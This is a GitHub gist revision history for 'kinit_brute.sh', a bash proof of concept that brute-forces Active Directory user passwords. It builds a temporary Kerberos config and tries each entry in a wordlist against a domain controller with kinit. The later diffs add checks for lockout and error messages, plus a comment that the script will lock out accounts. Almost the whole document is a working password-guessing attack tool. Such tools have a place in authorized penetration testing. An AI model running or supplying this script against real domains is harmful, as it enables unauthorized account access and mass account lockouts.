Last active
June 6, 2021 18:23
-
-
Save ropnop/8711392d5e1d9a0ba533705f7f4f455f to your computer and use it in GitHub Desktop.
Revisions
-
ropnop revised this gist
Jul 29, 2017 . 1 changed file with 4 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,6 +6,7 @@ # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful USERNAME=$1 @@ -53,7 +54,9 @@ while read PASSWORD; do echo "[!] Account locked out!" exit 1 fi if [[ $RESULT == *"Password incorrect"* ]]; then : elif [[ -z "$RESULT" ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 -
Jul 28, 2017 . 1 changed file with 10 additions and 8 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 @@ -14,7 +14,7 @@ WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi @@ -49,13 +49,15 @@ while read PASSWORD; do echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then echo "[!] Account locked out!" exit 1 fi if [[ -z "$RESULT" ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 else echo "[+] Error: $RESULT" fi done <$WORDLIST -
Jul 27, 2017 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients USERNAME=$1 -
Jul 26, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ #!/bin/bash # Title: kinit_brute.sh # Author: @ropnop # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 DOMAINCONTROLLER=$2 WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}') echo "[+] User: $USERNAME" echo "[+] Kerberos Realm: $DOMAIN" echo "[+] KDC: $DOMAINCONTROLLER" echo "" KRB5_CONF=$(mktemp) cat > $KRB5_CONF <<'asdfasdf' [libdefaults] default_realm = $DOMAIN [realms] $DOMAIN = { kdc = $DOMAINCONTROLLER admin_server = $DOMAINCONTROLLER } asdfasdf while read PASSWORD; do RESULT=$( echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1 ) if [[ $RESULT == *"unable to reach"* ]]; then echo "[!] Unable to find KDC for realm. Check domain and DC" exit 1 fi if [[ $RESULT == *"Wrong realm"* ]]; then echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT != *"Password incorrect"* ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 fi done <$WORDLIST